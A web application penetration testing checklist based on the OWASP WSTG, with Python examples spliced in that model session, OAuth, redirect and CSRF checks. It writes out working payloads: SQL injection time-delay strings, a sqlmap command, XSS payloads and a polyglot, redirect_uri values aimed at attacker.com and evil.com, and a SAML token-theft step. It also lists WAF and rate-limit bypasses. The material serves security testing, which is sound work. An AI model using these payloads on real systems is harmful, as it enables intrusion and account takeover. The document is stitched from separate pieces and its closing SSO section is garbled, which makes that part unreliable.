WSTG (Web Application Security Testing) OWASP - Mind Map

Uploaded by Matheus Fraga

The document outlines steps for performing reconnaissance and penetration testing on a web application, including identifying technologies used, enumerating subdomains and directories, port scanning, template-based scanning, session management testing, authentication testing, and OAuth testing. The testing includes modifying cookies, checking for weak registration and session management, bypassing authentication, and ensuring resources require authentication.

- **Recon Phase**

  - [ ] Identify web server, technologies and database
  - [ ] Subsidiary and Acquisition Enumeration
  - [ ] Reverse Lookup
  - [ ] ASN & IP Space Enumeration and Service Enumeration
  - [ ] Google Dorking
  - [ ] Github Recon
  - [ ] Directory Enumeration
  - [ ] IP Range Enumeration
  - [ ] JS Files Analysis
  - [ ] Subdomain Enumeration and Bruteforcing
  - [ ] Subdomain Takeover
  - [ ] Parameter Fuzzing
  - [ ] Port Scanning
  - [ ] Template-Based Scanning (Nuclei)
  - [ ] Wayback History
  - [ ] Broken Link Hijacking
  - [ ] Internet Search Engine Discovery
  - [ ] Misconfigured Cloud Storage

- **Registration Feature Testing**

  - [ ] Check for duplicate registration / overwriting an existing user
  - [ ] Check for weak password policy
  - [ ] Check for reuse of existing usernames
  - [ ] Check for insufficient email verification process
  - [ ] Weak registration implementation: allows disposable email addresses
  - [ ] Weak registration implementation: over HTTP
  - [ ] Overwrite default web application pages by specially crafted username registrations. After registration, does your profile link appear as something like www.tushar.com/tushar?
    a. If so, enumerate default folders of the web application such as /images, /contact, /portfolio
    b. Register usernames such as images, contact, portfolio
    c. Check whether those default folders have been overwritten by your profile link or not

- **Session Management Testing**

  - [ ] Identify the actual session cookie among the bulk of cookies set by the application
  - [ ] Decode cookies using standard decoding algorithms such as Base64, hex, URL, etc.
  - [ ] Modify the session token value by 1 bit/byte, resubmit, and do the same for all tokens. This reduces the amount of work needed to identify which part of the token is actually being used and which is not
  - [ ] If self-registration is available and you can choose your username, log in with a series of similar usernames containing small variations between them, such as A, AA, AAA, AAAA, AAAB, AAAC, AABA, and so on, and compare the tokens issued. Do the same for any other user-specific data submitted at login or stored in user profiles (such as an email address)
  - [ ] Check for session cookies and cookie expiration date/time
  - [ ] Identify cookie domain scope
  - [ ] Check for HttpOnly flag in cookie
  - [ ] Check for Secure flag in cookie if the application is over SSL
  - [ ] Check for session fixation, i.e. compare the value of the session cookie before and after authentication
  - [ ] Replay the session cookie from a different effective IP address or system to check whether the server binds the session to the client machine or not
  - [ ] Check for concurrent login through different machine/IP
  - [ ] Check whether any user-pertaining information is stored in the cookie value. If yes, tamper with it using another user's data
  - [ ] Failure to invalidate session on email change or 2FA activation
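The bit-flip step above can be scripted. What follows is an added example, not part of the original checklist: it runs a cookie through the listed decodings, flips one bit in every byte of the decoded token, resubmits each variant through a check function, and reports which byte offsets the server ignores. The target is a constructed stand-in, a hypothetical application whose cookie is Base64 of `user_id:secret:filler` and which validates only the first two fields; replacing `constructed_server_check` with a function that replays the cookie against a real endpoint and returns whether the session is still valid turns it into the real test.

```python
import base64
import binascii
import urllib.parse
from typing import Callable, List, Tuple

# --- constructed target (hypothetical application, not a real product) ------
# Assumed cookie layout: base64("<user_id>:<secret>:<filler>"). The filler is
# carried around but never checked; discovering that is the point of the test.
_VALID_USER, _VALID_SECRET = "1042", "d4e5f6a7"

def constructed_server_check(token: str) -> bool:
    """Stand-in for resubmitting the cookie: True means 'still logged in'."""
    try:
        raw = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return False
    fields = raw.split(":")
    return len(fields) == 3 and fields[0] == _VALID_USER and fields[1] == _VALID_SECRET

def make_constructed_cookie() -> str:
    """The cookie a victim session would carry in this constructed app."""
    return base64.b64encode(f"{_VALID_USER}:{_VALID_SECRET}:zzzzzzzz".encode()).decode()

# --- analysis ---------------------------------------------------------------
def decode_layers(value: str) -> List[Tuple[str, bytes]]:
    """Try the standard decodings named in the checklist (URL, Base64, hex) and
    return every layer that decodes cleanly, to expose the token structure."""
    layers = []
    unquoted = urllib.parse.unquote(value)
    if unquoted != value:
        layers.append(("url", unquoted.encode()))
    try:
        layers.append(("base64", base64.b64decode(unquoted, validate=True)))
    except binascii.Error:
        pass
    try:
        layers.append(("hex", bytes.fromhex(unquoted)))
    except ValueError:
        pass
    return layers

def flip_each_byte(token: str, check: Callable[[str], bool]) -> List[int]:
    """Flip the low bit of each byte of the Base64-decoded token, re-encode,
    resubmit via `check`, and return the byte offsets the server ignores.
    Offsets absent from the result are the ones the server actually validates."""
    raw = base64.b64decode(token)
    ignored = []
    for i in range(len(raw)):
        mutated = bytearray(raw)
        mutated[i] ^= 0x01
        if check(base64.b64encode(bytes(mutated)).decode()):
            ignored.append(i)
    return ignored

def report(token: str, check: Callable[[str], bool]) -> str:
    """Human-readable map of which bytes matter: ^ = checked, . = ignored."""
    raw = base64.b64decode(token)
    ignored = set(flip_each_byte(token, check))
    marks = "".join("." if i in ignored else "^" for i in range(len(raw)))
    return f"{raw.decode('ascii', 'replace')}\n{marks}   (^ = checked, . = ignored)"

if __name__ == "__main__":
    cookie = make_constructed_cookie()
    print(decode_layers(cookie))
    print(report(cookie, constructed_server_check))
```

Against the constructed app the map shows the user id, both separators and the secret as checked and the trailing filler as ignored; on a real target the same output tells you which bytes to concentrate on when looking for structure (a user id, a timestamp, a truncated hash) and which can be discarded.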

- **Authentication Testing**

  - [ ] Username enumeration
  - [ ] Bypass authentication using various SQL injections in the username and password fields
  - Lack of password confirmation on
    - [ ] Change email address
    - [ ] Change password
    - [ ] Manage 2FA
  - [ ] Is it possible to use resources without authentication? (access violation)
  - [ ] Check whether user credentials are transmitted over SSL or not
  - [ ] Weak login function: HTTP and HTTPS are both available
  - Test the user account lockout mechanism against brute force attacks
    - Variation: if the server blocks rapid-fire requests, retry with the time-throttle option in Intruder and repeat the process
    - [ ] Bypass rate limiting by tampering the User-Agent to a mobile user agent
    - [ ] Bypass rate limiting by tampering the User-Agent to an anonymous user agent
    - [ ] Bypass rate limiting by using a null byte
    - [ ] Create a password wordlist using the cewl command
  - Test OAuth login functionality
    - OAuth Roles
      - [ ] Resource Owner → User
      - [ ] Resource Server → Twitter
      - [ ] Client Application → Twitterdeck.com
      - [ ] Authorization Server → Twitter
      - [ ] client_id → Twitterdeck ID (this is a public, non-secret unique identifier)
      - [ ] client_secret → secret token known to Twitter and Twitterdeck, used to obtain access_tokens
      - [ ] response_type → defines the response type, e.g. code, token
      - [ ] scope → the requested level of access Twitterdeck wants
      - [ ] redirect_uri → the URL the user is redirected to after the authorization is complete
      - [ ] state → the main CSRF protection in OAuth; can persist data between the user being directed to the authorization server and back again
      - [ ] grant_type → defines the grant type and the returned token type
      - [ ] code → the authorization code Twitter generated, delivered as ?code=...; it is exchanged together with client_id and client_secret for an access_token
      - [ ] access_token → the token Twitterdeck uses to make API requests on behalf of the user
      - [ ] refresh_token → allows an application to obtain a new access_token without prompting the user
    - Code Flaws
      - [ ] Re-using the code
      - [ ] Code prediction/bruteforce and rate limiting
      - [ ] Is the code for application X valid for application Y?
    - Redirect_uri Flaws
      - [ ] URL isn't validated at all: ?redirect_uri=https://attacker.com
      - [ ] Subdomains allowed (subdomain takeover or open redirect on those subdomains): ?redirect_uri=https://sub.twitterdeck.com
      - [ ] Host is validated, path isn't (chain an open redirect): ?redirect_uri=https://twitterdeck.com/callback?redirectUrl=https://evil.com
      - [ ] Host is validated, path isn't (Referer leakage): include external content on the HTML page and leak the code via Referer
      - [ ] Weak regexes
      - [ ] Bruteforcing the URL-encoded chars after the host: redirect_uri=https://twitterdeck.com§FUZZ§
      - [ ] Bruteforcing the keyword whitelist after the host (or on any whitelist-based open redirect filter): ?redirect_uri=https://§FUZZ§.com
      - [ ] URI validation in place: use typical open redirect payloads
    - State Flaws
      - [ ] Missing state parameter? (CSRF)
      - [ ] Predictable state parameter?
      - [ ] Is the state parameter being verified?
    - Misc
      - [ ] Is client_secret validated?
      - [ ] Pre-ATO using Facebook phone-number signup
      - [ ] No email validation: pre-ATO
  - Test 2FA Misconfiguration
    - [ ] Response manipulation
    - [ ] Status code manipulation
    - [ ] 2FA code leakage in response
    - [ ] 2FA code reusability
    - [ ] Lack of brute-force protection
    - [ ] Missing 2FA code integrity validation
    - [ ] With null or 000000
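The OAuth "Code Flaws", "State Flaws" and "Is client_secret validated?" items above are all tests of bindings the authorization code flow is supposed to enforce. The following is an added example, not part of the original checklist and not any real provider's code: a constructed in-memory authorization server and client, with hypothetical client ids, secrets and callback URLs, that enforce those bindings, and a `demo()` that replays each listed attack against them so the expected rejection is visible. A target that accepts any of these replays has the corresponding flaw.

```python
import secrets
import time
from typing import Dict, Optional

class AuthorizationServer:
    """Constructed authorization server: codes are bound to one client and one
    registered redirect_uri, are single-use, and expire after 60 seconds."""

    def __init__(self, clients: Dict[str, dict]):
        self.clients = clients             # client_id -> {"secret": ..., "redirect_uris": {...}}
        self._codes: Dict[str, dict] = {}  # code -> binding record

    def authorize(self, client_id: str, redirect_uri: str, user: str, now: float) -> str:
        client = self.clients.get(client_id)
        if client is None or redirect_uri not in client["redirect_uris"]:
            raise ValueError("unknown client or unregistered redirect_uri")
        code = secrets.token_urlsafe(32)   # 256 random bits: not predictable or brute-forceable
        self._codes[code] = {"client_id": client_id, "redirect_uri": redirect_uri,
                             "user": user, "expires": now + 60, "used": False}
        return code

    def token(self, client_id: str, client_secret: str, code: str,
              redirect_uri: str, now: float) -> Optional[str]:
        client = self.clients.get(client_id)
        if client is None or not secrets.compare_digest(client["secret"], client_secret):
            return None                    # client_secret is validated
        rec = self._codes.get(code)
        if rec is None or rec["used"] or now > rec["expires"]:
            return None                    # replayed or expired code
        rec["used"] = True                 # burn the code whatever happens next
        if rec["client_id"] != client_id or rec["redirect_uri"] != redirect_uri:
            return None                    # a code for app X is not valid for app Y
        return f"access_token_for_{rec['user']}"

class Client:
    """Constructed client application: per-browser-session state, verified on return."""

    def __init__(self, client_id: str, client_secret: str, redirect_uri: str, srv: AuthorizationServer):
        self.client_id, self.client_secret = client_id, client_secret
        self.redirect_uri, self.srv = redirect_uri, srv
        self._pending: Dict[str, str] = {}  # browser session id -> expected state

    def start_login(self, browser_session: str) -> dict:
        state = secrets.token_urlsafe(16)   # unpredictable and tied to this browser session
        self._pending[browser_session] = state
        return {"client_id": self.client_id, "redirect_uri": self.redirect_uri,
                "response_type": "code", "state": state}

    def callback(self, browser_session: str, code: str, state: str, now: float) -> Optional[str]:
        expected = self._pending.pop(browser_session, None)
        if expected is None or not secrets.compare_digest(expected, state):
            return None                     # missing or unverified state = login CSRF
        return self.srv.token(self.client_id, self.client_secret, code, self.redirect_uri, now)

def demo() -> Dict[str, bool]:
    """Replay each checklist attack; every value should be True on a correct implementation."""
    cb = "https://twitterdeck.example/callback"          # hypothetical registered callback
    srv = AuthorizationServer({
        "twitterdeck": {"secret": "s3cr3t", "redirect_uris": {cb}},
        "otherapp":    {"secret": "other",  "redirect_uris": {"https://other.example/cb"}},
    })
    client = Client("twitterdeck", "s3cr3t", cb, srv)
    now = time.time()
    req = client.start_login("sess-A")
    code = srv.authorize(req["client_id"], req["redirect_uri"], "alice", now)
    results = {"happy_path": client.callback("sess-A", code, req["state"], now) == "access_token_for_alice"}
    # Re-using the code
    results["reuse_rejected"] = srv.token("twitterdeck", "s3cr3t", code, cb, now) is None
    # Is the code for application X valid for application Y?
    code2 = srv.authorize("twitterdeck", cb, "alice", now)
    results["cross_client_rejected"] = srv.token("otherapp", "other", code2, "https://other.example/cb", now) is None
    # Is client_secret validated?
    code3 = srv.authorize("twitterdeck", cb, "alice", now)
    results["secret_checked"] = srv.token("twitterdeck", "wrong", code3, cb, now) is None
    # Attacker delivers their own code to the victim's browser: state mismatch
    client.start_login("sess-victim")
    code4 = srv.authorize("twitterdeck", cb, "attacker", now)
    results["state_mismatch_rejected"] = client.callback("sess-victim", code4, "attacker-state", now) is None
    # Stale code presented after expiry
    req3 = client.start_login("sess-B")
    code5 = srv.authorize("twitterdeck", cb, "bob", now)
    results["expiry_enforced"] = client.callback("sess-B", code5, req3["state"], now + 120) is None
    return results

if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:26s} {'ok' if ok else 'FLAW'}")
```

When testing a real target, each `demo()` case maps to one manual request: redeem the same `code` twice, redeem app X's code at app Y's token endpoint (or with app Y's `redirect_uri`), send a wrong `client_secret`, and complete the callback with a `state` the victim's session never issued.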

- **My Account (Post Login) Testing**

  - [ ] Find the parameter which carries the active account's user id. Try to tamper with it in order to change the details of other accounts
  - [ ] Create a list of features that pertain to a user account only: change email, change password, change account details (name, number, address, etc.). Try CSRF on each
  - [ ] Post login, change the email id and update it with an existing email id. Check whether it gets validated on the server side or not. Does the application send a confirmation link to the new email address? What if the user does not confirm the link within some time frame?
  - [ ] Open the profile picture in a new tab and check the URL. Look for email id/user id info. EXIF geolocation data not stripped from uploaded images
  - [ ] Check the account deletion option if the application provides it, and confirm the deletion via the forgot password feature
  - [ ] Change the email id, account id or user id parameter and try to brute force other users' passwords
  - [ ] Check whether the application re-authenticates before performing sensitive post-authentication operations
- **Forgot Password Testing**

  - [ ] Failure to invalidate session on logout and password reset
  - [ ] Check the uniqueness of the forgot password reset link/code
  - [ ] Check whether the reset link expires if it is not used by the user for a certain amount of time
  - [ ] Find the user account identification parameter and tamper with the id or parameter value to change another user's password
  - [ ] Check for weak password policy
  - [ ] Weak password reset implementation: token is not invalidated after use
  - [ ] If the reset link carries another parameter such as date and time, change the date and time value in order to make an expired reset link active and valid again
  - [ ] Check whether security questions are asked. How many guesses are allowed? Is a lockout policy maintained or not?
  - [ ] Enter only spaces in the new password and confirm password fields, submit, and see the result
  - [ ] Does it display the old password on the same page after completing the forgot password process?
  - [ ] Request two password reset links and use the older one from the user's email
  - [ ] Check whether active sessions get destroyed upon changing the password or not
  - [ ] Weak password reset implementation: password reset token sent over HTTP
  - [ ] Send continuous forgot password requests so that it may reveal sequential tokens
- **Contact Us Form Testing**

  - [ ] Is CAPTCHA implemented on the contact us form in order to restrict email flooding attacks?
  - [ ] Does it allow uploading a file to the server?
  - [ ] Blind XSS

- **Product Purchase Testing**

  - Buy Now
    - [ ] Tamper with the product ID to purchase another, higher-valued product at a low price
    - [ ] Tamper with the product data in order to increase the number of products for the same price
  - Gift/Voucher
    - [ ] Tamper with the gift/voucher count in the request (if any) to increase/decrease the number of vouchers/gifts to be used
    - [ ] Tamper with the gift/voucher value to increase/decrease the value of the voucher in terms of money (e.g. if a $100 voucher is given, tamper with the value to increase or decrease the amount)
    - [ ] Reuse a gift/voucher by submitting old gift values through parameter tampering
    - [ ] Check the uniqueness of the gift/voucher parameter and try guessing other gift/voucher codes
    - [ ] Use the parameter pollution technique to add the same voucher twice by appending the same parameter name and value again with & in the Burp Suite request
  - Add/Delete Product from Cart
    - [ ] Tamper with the user id to delete products from another user's cart
    - [ ] Tamper with the cart id to add/delete products in another user's cart
    - [ ] Identify the cart id/user id of the cart feature to view the items added from another user's account
  - Address
    - [ ] Tamper with the Burp Suite request to change another user's shipping address to yours
    - [ ] Try stored XSS by adding an XSS vector in the shipping address
    - [ ] Use the parameter pollution technique to add two shipping addresses instead of one, trying to manipulate the application into sending the same item to two shipping addresses
  - Place Order
    - [ ] Tamper with the payment option parameter to change the payment method. E.g. some items cannot be ordered for cash on delivery, but tampering with the request parameters from the debit/credit/PayPal/net banking option to cash on delivery may allow you to place an order for that particular item
    - [ ] Tamper with the amount value for payment manipulation in each main and sub request and response
    - [ ] Check whether the CVV is sent in cleartext or not
    - [ ] Check whether the application itself processes your card details and then performs the transaction, or calls a third-party payment processing company to perform the transaction
  - Track Order
    - [ ] Track another user's order by guessing the order tracking number
    - [ ] Brute force the tracking number prefix or suffix to track orders of other users en masse
  - Wish list page testing
    - [ ] Check whether user A can add/remove products in the wishlist of user B's account
    - [ ] Check whether user A can add products into user B's cart from his/her (user A's) wishlist section
  - Post product purchase testing
    - [ ] Check whether user A can cancel orders for user B's purchase
    - [ ] Check whether user A can view/check orders already placed by user B
    - [ ] Check whether user A can modify the shipping address of an order placed by user B
  - Out of band testing
    - [ ] Can the user order a product which is out of stock?

- **Banking Application Testing**

  - Billing Activity
    - [ ] Check whether user 'A' can view the account statement of user 'B'
    - [ ] Check whether user 'A' can view the transaction report of user 'B'
    - [ ] Check whether user 'A' can view the summary report of user 'B'
    - [ ] Check whether user 'A' can register for monthly/weekly account statements via email on behalf of user 'B'
    - [ ] Check whether user 'A' can update the existing email id of user 'B' in order to retrieve the monthly/weekly account summary
  - Deposit/Loan/Linked/External Account Checking
    - [ ] Check whether user 'A' can view the deposit account summary of user 'B'
    - [ ] Check for account balance tampering on deposit accounts
  - Tax Deduction Inquiry Testing
    - [ ] Check whether user 'A' with customer id 'a' can see the tax deduction details of user 'B' by tampering with the customer id to 'b'
    - [ ] Check parameter tampering for increasing and decreasing the interest rate, interest amount, and tax refund
    - [ ] Check whether user 'A' can download the TDS details of user 'B'
    - [ ] Check whether user 'A' can request a cheque book on behalf of user 'B'
  - Fixed Deposit Account Testing
    - [ ] Check whether it is possible for user 'A' to open an FD account on behalf of user 'B'
    - [ ] Check whether a user can open an FD account with an amount greater than the current account balance
  - Stopping Payment on basis of cheque/date range
    - [ ] Can user 'A' stop the payment of user 'B' via cheque number?
    - [ ] Can user 'A' stop payment on the basis of a date range for user 'B'?
  - Status Enquiry Testing
    - [ ] Can user 'A' view the status enquiry of user 'B'?
    - [ ] Can user 'A' modify the status enquiry of user 'B'?
    - [ ] Can user 'A' post an enquiry on behalf of user 'B' from his own account?
  - Fund transfer testing
    - [ ] Is it possible to redirect a transfer that user 'A' intended for user 'B' to user 'C' instead?
    - [ ] Can the fund transfer amount be manipulated?
    - [ ] Can user 'A' modify the payee list of user 'B' by parameter manipulation from his/her own account?
    - [ ] Is it possible to add a payee without proper validation in user 'A''s own account or to user 'B''s account?
  - Schedule transfer testing
    - [ ] Can user 'A' view the scheduled transfers of user 'B'?
    - [ ] Can user 'A' change the details of a scheduled transfer for user 'B'?
  - Testing of fund transfer via NEFT
    - [ ] Amount manipulation via NEFT transfer
    - [ ] Check whether user 'A' can view the NEFT transfer details of user 'B'
  - Testing for Bill Payment
    - [ ] Check whether a user can register a payee without any checker approval
    - [ ] Check whether user 'A' can view the pending payments of user 'B'
    - [ ] Check whether user 'A' can view the payment-made details of user 'B'
- **Open Redirection Testing**

  - Common injection parameters

```markup
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
```

  - [ ] Use Burp's 'find' option in order to find parameters such as url, red, redirect, redir, origin, redirect_uri, target, etc.
  - [ ] Check the value of these parameters, which may contain a URL
  - [ ] Change the URL value to www.tushar.com and check whether you get redirected or not
  - [ ] Try a single slash and URL encoding
  - [ ] Using a whitelisted domain or keyword
  - [ ] Using // to bypass a blacklisted http keyword
  - [ ] Using https: to bypass a blacklisted // keyword
  - [ ] Using \\ to bypass a blacklisted // keyword
  - [ ] Using \/\/ to bypass a blacklisted // keyword
  - [ ] Using a null byte %00 to bypass a blacklist filter
  - [ ] Using the ° symbol to bypass
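The bypass list above and the "Redirect_uri Flaws" list in the OAuth section are two views of the same defect: a redirect target checked as a string rather than as a parsed URL. The following is an added example, not part of the original checklist, that puts the page's payloads through three checkers: a keyword check of the kind the `//`, `\\`, `https:` and whitelisted-keyword tricks defeat, a regex with an unescaped dot and no end anchor (the "Weak regexes" item), and a strict check that parses the URL, normalises backslashes, rejects userinfo, null bytes and query strings, and compares the whole value against the registered callback or accepts only a single-slash relative path. The host names and the registered callback are hypothetical.

```python
import re
from typing import Callable, Dict, List
from urllib.parse import urlsplit

TRUSTED_HOST = "twitterdeck.com"                     # hypothetical trusted host
REGISTERED_REDIRECT = "https://twitterdeck.com/callback"  # hypothetical registered callback

# Payloads from the checklist above and from the OAuth redirect_uri section.
# A sound checker rejects every one of them.
ATTACKER_PAYLOADS: List[str] = [
    "https://attacker.com",                                          # not validated at all
    "https://sub.twitterdeck.com",                                   # subdomains allowed
    "https://twitterdeck.com/callback?redirectUrl=https://evil.com", # host validated, path not
    "https://twitterdeck.com.evil.com/callback",                     # trusted host as a prefix
    "https://evil.com/twitterdeck.com",                              # whitelisted keyword anywhere
    "//evil.com",                                                    # // instead of http
    "https:evil.com",                                                # https: without //
    "\\\\evil.com",                                                  # \\ for //
    "/\\/evil.com",                                                  # \/\/ for //
    "https://twitterdeck.com%00.evil.com/callback",                  # null byte
    "https://twitterdeckXcom/callback",                              # unescaped '.' in regex
    "https://evil.com@twitterdeck.com/callback",                     # userinfo trick
]
LEGITIMATE: List[str] = ["https://twitterdeck.com/callback", "/account/settings"]

def naive_keyword_check(url: str) -> bool:
    """'Host validated' the wrong way: the trusted name merely has to appear."""
    return TRUSTED_HOST in url and not url.lower().startswith("http://")

def weak_regex_check(url: str) -> bool:
    """Unescaped dot, no end anchor: matches twitterdeck.com.evil.com and twitterdeckXcom."""
    return re.match(r"^https://twitterdeck.com", url) is not None

def strict_check(url: str) -> bool:
    """Parse, normalise, and compare the whole registered value; or accept only a
    same-site relative path that begins with exactly one slash."""
    if "\x00" in url or "%00" in url.lower():
        return False
    candidate = url.replace("\\", "/")       # browsers treat backslash as slash
    parts = urlsplit(candidate)
    if not parts.scheme and not parts.netloc:
        return candidate.startswith("/") and not candidate.startswith("//")
    if parts.scheme != "https" or parts.username or parts.password:
        return False
    if parts.query or parts.fragment:
        return False
    return f"{parts.scheme}://{parts.hostname}{parts.path}" == REGISTERED_REDIRECT

def evaluate(check: Callable[[str], bool]) -> Dict[str, object]:
    """Which attacker payloads a checker lets through, and whether legitimate targets still pass."""
    return {"bypassed": [p for p in ATTACKER_PAYLOADS if check(p)],
            "legit_ok": all(check(u) for u in LEGITIMATE)}

if __name__ == "__main__":
    for name, fn in [("naive keyword", naive_keyword_check),
                     ("weak regex", weak_regex_check),
                     ("strict parse", strict_check)]:
        print(name, evaluate(fn))
```

Running it shows the keyword check passing six of the twelve payloads, the regex passing four, and the strict check passing none while still accepting both legitimate targets; when a target's redirect handling behaves like one of the first two, the corresponding payloads are the ones to send.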

- **Host Header Injection**

- [ ] Supply an arbitrary Host header

- [ ] Check for flawed validation

- Send ambiguous requests

- [ ] Inject duplicate Host headers

- [ ] Supply an absolute URL

- [ ] Add line wrapping

- [ ] Inject host override headers

Web App PenTest Checklist (Prepared by: Tushar Verma)

- **SQL Injection Testing**

  - Entry point detection
    - [ ] Simple characters
    - [ ] Multiple encoding
    - [ ] Merging characters
    - [ ] Logic testing
    - [ ] Weird characters
  - Use SQLmap to identify vulnerable parameters
    - [ ] Fill in the form in the browser GUI and submit it normally
    - [ ] Go to the history tab in Burp Suite and find the relevant request
    - [ ] Right click and select the option "copy to file"
    - [ ] Save the file as anyname.txt
    - [ ] SQLmap command to run
      - [ ] python sqlmap.py -r ~/Desktop/textsqli.txt --proxy=http://127.0.0.1:8080
    - [ ] Run the SQL injection scanner on all requests
  - Bypassing WAF
    - [ ] Using a null byte before the SQL query
    - [ ] Using SQL inline comment sequences
    - [ ] URL encoding
    - [ ] Changing case (uppercase/lowercase)
    - [ ] Use SQLmap tamper scripts
  - Time delays

```markup
Oracle      dbms_pipe.receive_message(('a'),10)
Microsoft   WAITFOR DELAY '0:0:10'
PostgreSQL  SELECT pg_sleep(10)
MySQL       SELECT sleep(10)
```

  - Conditional delays

```markup
Oracle      SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
Microsoft   IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
PostgreSQL  SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
MySQL       SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')
```

- **Cross-Site Scripting Testing**

  - [ ] Try XSS using the QuickXSS tool by theinfosecguy
  - [ ] Upload a file named '"><img src=x onerror=alert(document.domain)>.txt
  - [ ] If script tags are banned, use <h1> and other HTML tags
  - [ ] If output is reflected back inside JavaScript as the value of a variable, just use alert(1)
  - [ ] If " is filtered, use this payload: /><img src=d onerror=confirm(/tushar/);>
  - [ ] Upload JavaScript inside an image file
  - [ ] An unusual way to execute your JS payload is to change the method from POST to GET; it sometimes bypasses filters
  - Tag attribute value
    - [ ] Input landed in: <input type="text" name="state" value="INPUT_FROM_USER">
    - [ ] Payload to be inserted: " onfocus="alert(document.cookie)"
    - [ ] Syntax-encoded payload: "%3cscript%3ealert(document.cookie)%3c/script%3e"
  - XSS filter evasion
    - [ ] < and > can be replaced with the HTML entities &lt; and &gt;
    - [ ] You can try an XSS polyglot, e.g.: javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
  - XSS Firewall Bypass
    - [ ] Check whether the firewall is blocking only lowercase
    - [ ] Try to break the firewall regex with a new line (\r\n)
    - [ ] Try double encoding
    - [ ] Test for recursive filters
    - [ ] Inject an anchor tag without whitespace
    - [ ] Try to bypass whitespace filters using a bullet
    - [ ] Try changing the request method

- **CSRF Testing**

  - [ ] Validation of CSRF token depends on request method
  - [ ] Validation of CSRF token depends on token being present
  - [ ] CSRF token is not tied to the user session
  - [ ] CSRF token is tied to a non-session cookie
  - [ ] Validation of Referer depends on header being present
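Each CSRF item above is a specific shortcut in the server's validation logic. The following is an added example, not part of the original checklist, with a constructed request object, constructed session store and five validators: four reproduce the listed flaws (validation skipped for GET, skipped when the token is absent, token accepted from any session, token compared to a separate cookie instead of the session, Referer checked only when present) and one does it correctly by comparing the submitted token, in constant time, against the token stored in the server-side session. `forged_requests()` is the set of cross-site requests an attacker page can make the victim's browser send; `accepted_by()` shows which of them each validator lets through. Session ids, tokens and host names are hypothetical.

```python
import hmac
from dataclasses import dataclass, field
from typing import Callable, Dict, List

@dataclass
class Request:
    method: str
    cookies: Dict[str, str] = field(default_factory=dict)
    params: Dict[str, str] = field(default_factory=dict)
    headers: Dict[str, str] = field(default_factory=dict)

# Constructed server-side state: session id -> session data, each with its own CSRF token
SESSIONS = {
    "victim-sess": {"user": "victim", "csrf": "tokV"},
    "attacker-sess": {"user": "attacker", "csrf": "tokA"},
}
ISSUED_TOKENS = {"tokV", "tokA"}   # what a 'not tied to session' check consults

def flawed_depends_on_method(req: Request) -> bool:
    if req.method == "GET":        # GET is exempt, so the attacker uses GET
        return True
    return req.params.get("csrf") == SESSIONS[req.cookies["sid"]]["csrf"]

def flawed_depends_on_presence(req: Request) -> bool:
    if "csrf" not in req.params:   # no token, no check
        return True
    return req.params["csrf"] == SESSIONS[req.cookies["sid"]]["csrf"]

def flawed_not_tied_to_session(req: Request) -> bool:
    # Any token the app ever issued is accepted, so the attacker's own token works
    return req.params.get("csrf") in ISSUED_TOKENS

def flawed_tied_to_non_session_cookie(req: Request) -> bool:
    # Compared against a cookie the attacker can plant (e.g. via a subdomain
    # or a cookie-setting bug); the session cookie is never consulted
    tok = req.params.get("csrf")
    return tok is not None and tok == req.cookies.get("csrfcookie")

def flawed_referer_optional(req: Request) -> bool:
    ref = req.headers.get("Referer")
    if ref is None:                # absent Referer skips the check
        return True
    return ref.startswith("https://app.example/")

def correct_check(req: Request) -> bool:
    """Token must be present and equal (constant-time) to the one in this session."""
    session = SESSIONS.get(req.cookies.get("sid", ""))
    token = req.params.get("csrf")
    if session is None or token is None:
        return False
    return hmac.compare_digest(token, session["csrf"])

def forged_requests() -> Dict[str, Request]:
    """Cross-site requests an attacker page can trigger: the victim's session
    cookie rides along, the attacker controls method, parameters and Referer."""
    sid = {"sid": "victim-sess"}
    ref = {"Referer": "https://attacker.example/"}
    return {
        "get_instead_of_post": Request("GET", sid, {"email": "evil@x"}, ref),
        "token_omitted":       Request("POST", sid, {"email": "evil@x"}, ref),
        "attackers_own_token": Request("POST", sid, {"email": "evil@x", "csrf": "tokA"}, ref),
        "injected_cookie":     Request("POST", {**sid, "csrfcookie": "X"},
                                       {"email": "evil@x", "csrf": "X"}, ref),
        "referer_stripped":    Request("POST", sid, {"email": "evil@x", "csrf": "tokA"}, {}),
    }

def accepted_by(check: Callable[[Request], bool]) -> List[str]:
    """Names of the forged requests a validator lets through."""
    return [name for name, req in forged_requests().items() if check(req)]

if __name__ == "__main__":
    for fn in (flawed_depends_on_method, flawed_depends_on_presence, flawed_not_tied_to_session,
               flawed_tied_to_non_session_cookie, flawed_referer_optional, correct_check):
        print(f"{fn.__name__:36s} accepts {accepted_by(fn)}")
```

Each forged request is also the manual probe for its checklist item: switch the verb to GET, delete the token parameter, substitute a token from your own session, pair a planted cookie with a matching parameter, and send the request from a page with `<meta name="referrer" content="no-referrer">`.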

- **SSO Vulnerabilities**

- [ ] If internal.company.com Redirects
You To SSO e.g. auth.company.com, Do
FUZZ

On Internal.company.com

- [ ] If company.com/internal Redirects
You To SSO e.g. Google login, Try To Insert

public Before internal e.g. company.


com/public/internal To Gain Access
Internal

- [ ] Try To Craft SAML Request With


Token And Send It To The Server And
Figure

Out How Server Interact With This

- [ ] If There Is
AssertionConsumerServiceURL In Token
Request Try To Insert Your

Domain e.g. http://me.com As Value To


Steal The Token

- [ ] If There Is
AssertionConsumerServiceURL In Token
Request Try To Do FUZZ
https://github.com/OWASP/wstg/tree/
On Value Of master/document/4-Web_Application_
AssertionConsumerServiceURL If It Is Not Security_Testing
Similar To Origin
Project https://owasp.org/www-project-web-
- [ ] If There Is Any UUID, Try To Change security-testing-guide/latest/
